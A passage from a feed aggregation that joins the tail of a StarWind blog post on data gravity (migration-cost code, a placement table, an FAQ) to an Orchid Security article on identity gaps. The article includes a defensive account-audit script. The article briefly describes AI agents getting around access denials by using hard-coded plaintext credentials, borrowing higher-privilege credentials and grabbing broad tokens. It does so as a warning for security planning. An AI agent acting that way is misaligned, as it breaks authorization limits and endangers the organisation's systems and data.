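        "full_transfer_days": round(transfer_hours(size, a.link_gbps, a.link_efficiency) / 24, 1),
        "hot_tier_hours": round(hot_hours, 1),
        "needs_budget_request": cost > a.budget_threshold_usd,
        "hot_tier_fits_window": hot_hours <= a.cutover_window_hours,
    }


def first_year_unmovable(ds: Dataset, a: Assumptions, horizon_years: int = 5):
    """First year (0 = today) in which either test fails; None if movable throughout."""
    for year in range(horizon_years + 1):
        result = assess(ds, a, year)
        if result["needs_budget_request"] or not result["hot_tier_fits_window"]:
            return year
    return None


# Constructed sample: a 400-TB warehouse growing 60 % a year with a 20 % hot tier.
WAREHOUSE = Dataset("warehouse", size_tb=400.0, annual_growth=0.6, hot_fraction=0.2)
BASELINE = Assumptions(
    egress_usd_per_gb=0.05,        # placeholder
    link_gbps=10.0,
    link_efficiency=0.7,
    cutover_window_hours=48.0,
    budget_threshold_usd=50_000.0,
)

if __name__ == "__main__":
    for year in range(4):
        print(assess(WAREHOUSE, BASELINE, year))
    print("first year needing a budget request or missing the window:",
          first_year_unmovable(WAREHOUSE, BASELINE))
```

With these placeholder inputs the warehouse is movable today and next year, but by year two the egress bill alone crosses the threshold and the hot tier no longer fits a 48-hour window, which is exactly the point at which tiering or splitting the dataset has to be decided rather than deferred.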

Where should compute run?

| Placement | Best fit | Watch out for | Data gravity angle |
|---|---|---|---|
| Cloud | Elastic analytics, SaaS integration, variable demand | Egress, region choice, long-term storage cost | Works best when data can live there long term |
| On-premises | Regulated data, predictable workloads, low-latency apps | Capacity planning, hardware lifecycle | Keeps compute close to controlled data |
| Edge | Sensor data, video, local inference, disconnected sites | Operations across many locations | Processes data before it moves upstream |
| Hybrid | Mixed cloud, on-prem, and edge needs | Governance and tool sprawl | Puts each workload near its most important data |


If your workloads constantly move data across environments just to function, that’s usually a sign the placement model needs rethinking.

The role of HCI and on-premises storage

For organizations that keep gravity-sensitive workloads on-prem, the main challenge is keeping compute close to the data without adding infrastructure layers you don’t need.

Hyperconverged infrastructure (HCI) fits that pattern because it combines compute and storage resources within the same environment, which can help reduce latency and simplify operations for workloads that can’t easily move to the cloud.

StarWind Virtual SAN (VSAN) supports this model by pooling the local storage of hypervisor hosts into highly available shared storage for HCI clusters. From a data gravity perspective, this allows organizations to keep applications physically close to operational data while avoiding the cost and complexity of separate SAN infrastructure. Teams looking for a preconfigured deployment model can also use StarWind HCI Appliance (HCA) as a ready-to-deploy HCI platform.

Object storage platforms are increasingly important as datasets grow beyond traditional VM-centric infrastructure patterns. DataCore Swarm is designed for large-scale distributed object storage environments where unstructured data, archival content, AI datasets, media repositories, and edge-generated data continue expanding over time. Architectures like this help organizations scale storage horizontally while keeping data accessible across distributed environments without relying exclusively on centralized cloud repositories. I find HCI most useful when the alternative is explaining to a CFO why you need another storage array just to keep the VMs near the data.

FAQ

Why is data gravity important in 2026?

AI adoption, edge data growth, cloud egress costs, and sovereignty rules have all turned data location into an architectural decision. Where the data lives now drives where compute, analytics, backup, and AI infrastructure get deployed.

How does data gravity affect cloud strategy?

It complicates migration, multi-cloud design, and repatriation. Once large datasets pile up in one provider, moving them can mean high transfer costs, long migration windows, and a lot of validation work.

Is data gravity the same as vendor lock-in?

No. Lock-in is one possible outcome of data gravity, but gravity is broader. It includes size, latency, bandwidth, cost, governance, and legal constraints.

How does AI increase data gravity?

AI workloads need access to large volumes of trusted data. Training, fine-tuning, retrieval, and inference all work better when compute sits close to the governed data sources.

What’s the difference between data gravity and data sovereignty?

Gravity is a physical and economic constraint. Sovereignty is a legal one. Gravity makes data hard to move. Sovereignty can make moving it not allowed in the first place.

How can organizations reduce data gravity risks?

Organizations can reduce risk by mapping critical datasets, forecasting growth, modeling migration costs early, tiering storage, processing data locally at the edge, aligning compute placement with data locality, and defining realistic exit strategies before datasets become too large to move efficiently.

Why is HCI useful for managing data gravity?

HCI puts compute and storage in the same cluster, which keeps workloads close to data, cuts latency, simplifies on-prem deployments, and supports edge or regulated environments where shipping data to a distant platform isn’t realistic.

Final thoughts

If you’re still treating data placement as a secondary decision that can be fixed later, you’re setting yourself up for a very expensive surprise. We’ve watched teams spend more on a single egress migration than they would have spent on a couple of months of careful upfront planning. The hard truth is that your data will outlast your current platform, your current vendor, and probably your current job. Design for that. Keep compute flexible, keep data portable where governance allows, and never assume that the cheapest place to store something today is going to be the cheapest place to move it from tomorrow. Gravity is not a bug. It’s physics. Plan accordingly.



from StarWind Blog https://ift.tt/07Jhq4x
via IFTTT

Agent AI is Coming. Are You Ready?

New Industry Data Just Released Suggests Not.

On May 19th, 2026, Orchid Security released the results of our Identity Gap: Snapshot 2026. Among the findings, "identity dark matter" (the unseen, unmanaged elements of identity) now overshadows the visible elements 57% vs. 43%. And it couldn't have occurred at a worse time, with enterprises embracing Agent AI with both arms (and unfortunately, as Orchid co-founder Robert Wiseman explains, more than one eye closed). 

Why the concern, you may ask?

AI agents are shortcut-seekers by design. When given a task, they are trained to find the most efficient way to complete it, with the speed of machines and the creativity of humans. Denied access to a necessary system? Use a hard-coded credential stored in plaintext within the application. Need information they aren't entitled to read? "Borrow" a credential with higher privilege. Constantly being challenged across many different systems? Grab a broadly accepted token. Truly, Agent AI's creativity is remarkable. It just cuts both ways.

Just because an AI Agent can find a way to access an application, a system, or a database doesn't mean that it should. But where coding would restrict a traditional nonhuman actor and conscience should give a human pause, in most cases AI Agents have no such constraints or compunctions.

That's why well-managed identity and access management is a critical foundation to keeping Agent AI activity within authorized bounds. Look no further than the cloud outages reported at the start of the year to understand this importance.

Of course, IAM shortcuts, gaps, and exceptions have built up over the years. Even decades. So it's not reasonable to expect everything to be cleaned up at once. That's why the findings from this year's Identity Gap Snapshot (the exposures most common across North American and European enterprises) are so important and timely.

Top 3 Findings

  1. Invisible Non-Human Accounts: Two out of every three nonhuman accounts are set up locally in the application itself. That makes them unseen and unmanaged by the central IAM program. Understandable for machine and service accounts. Dangerous for autonomous AI agents.
  2. Excessive Permissions: Seventy percent of all applications have an excessive number of privileged accounts. Far more than expected in the area of "least privilege" access and a major risk given today's threat actors, as well as those AI agents mentioned above.
  3. Orphan Accounts: Forty percent of all accounts, across enterprise environments, were found to have outlived their authorized user. These "orphan" accounts are clearly unmanaged and likely unseen, and are ripe for the picking by threat actors and AI agents.
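All three findings are things an inventory audit can surface before an agent stumbles on them. The block below is an added example, not Orchid Security's tooling or methodology: it runs the three checks (app-local nonhuman accounts invisible to the central IdP, applications with more privileged accounts than a threshold allows, and accounts whose owner is gone or was never recorded) over a constructed account inventory and HR roster. The account names, the roster, the per-application privilege ceiling and the inventory schema are all assumptions.

```python
"""Identity-gap audit over an account inventory.

Added example, not Orchid Security's code. The inventory, roster and
thresholds are constructed; a real run would be fed from IdP and
application exports plus the HR system of record.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set


@dataclass(frozen=True)
class Account:
    name: str
    app: str                 # system that defines the account; "idp" = the central directory
    kind: str                # "human", "service" or "agent"
    owner: Optional[str]     # HR identifier of the accountable person, None if never recorded
    privileged: bool
    managed_by_idp: bool     # provisioned or federated from the central IAM program


# Constructed HR roster of active staff; "carol" has left the organisation.
ACTIVE_STAFF: Set[str] = {"alice", "bob", "dana"}

# Constructed inventory mixing directory accounts with app-local ones.
ACCOUNTS: List[Account] = [
    Account("alice", "idp", "human", "alice", privileged=False, managed_by_idp=True),
    Account("bob", "idp", "human", "bob", privileged=True, managed_by_idp=True),
    Account("carol", "idp", "human", "carol", privileged=True, managed_by_idp=True),
    Account("dana", "idp", "human", "dana", privileged=False, managed_by_idp=True),
    Account("erp-admin", "erp", "service", "bob", privileged=True, managed_by_idp=False),
    Account("erp-batch", "erp", "service", None, privileged=False, managed_by_idp=False),
    Account("agent-procure", "erp", "agent", "dana", privileged=True, managed_by_idp=False),
    Account("crm-sync", "crm", "service", "alice", privileged=False, managed_by_idp=True),
    Account("crm-agent", "crm", "agent", "carol", privileged=True, managed_by_idp=False),
]


def invisible_nonhuman(accounts: Iterable[Account]) -> List[Account]:
    """Finding 1: nonhuman accounts defined locally, outside the central IAM program."""
    return [a for a in accounts if a.kind != "human" and not a.managed_by_idp]


def excessive_privilege_apps(accounts: Iterable[Account], max_privileged: int = 1) -> Set[str]:
    """Finding 2: applications whose privileged-account count exceeds the ceiling.
    The ceiling is an assumption; set it per application from its actual admin model."""
    per_app = Counter(a.app for a in accounts if a.privileged)
    return {app for app, n in per_app.items() if n > max_privileged}


def orphan_accounts(accounts: Iterable[Account], active_staff: Set[str]) -> List[Account]:
    """Finding 3: accounts with no recorded owner or an owner no longer on the roster."""
    return [a for a in accounts if a.owner is None or a.owner not in active_staff]


def identity_gap_summary(accounts: List[Account], active_staff: Set[str]) -> dict:
    """Roll the three checks into the kind of percentages a snapshot report quotes."""
    nonhuman = [a for a in accounts if a.kind != "human"]
    invisible = invisible_nonhuman(accounts)
    orphans = orphan_accounts(accounts, active_staff)
    return {
        "accounts": len(accounts),
        "invisible_nonhuman": sorted(a.name for a in invisible),
        "invisible_nonhuman_pct": round(100.0 * len(invisible) / len(nonhuman), 1) if nonhuman else 0.0,
        "excessive_privilege_apps": sorted(excessive_privilege_apps(accounts)),
        "orphans": sorted(a.name for a in orphans),
        "orphan_pct": round(100.0 * len(orphans) / len(accounts), 1),
        # Agent accounts that are both orphaned and privileged deserve the first ticket.
        "privileged_orphan_agents": sorted(a.name for a in orphans if a.kind == "agent" and a.privileged),
    }


if __name__ == "__main__":
    for key, value in identity_gap_summary(ACCOUNTS, ACTIVE_STAFF).items():
        print(f"{key}: {value}")
```

The last field is the one worth reading first: an orphaned, privileged agent account is exactly the kind of credential the post describes an agent "borrowing", and it is invisible to the central program by construction, so neither a leaver process nor a quarterly access review will catch it unless the application's local accounts are pulled into the inventory.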

Those are just a few highlights from the full Identity Gap Snapshot. We encourage you to read the full report.

What You Can Do

If you are uncertain about how to address these (and similar) issues within your organization, or even how prevalent each one might be in your environment, our security researcher team has also published an Identity Security Readiness Checklist. If your organization is preparing for (or already participating in) the Agent AI transformation, the time to act is now.

This article is a contributed piece from one of our valued partners.



from The Hacker News https://ift.tt/OlITN1b
via IFTTT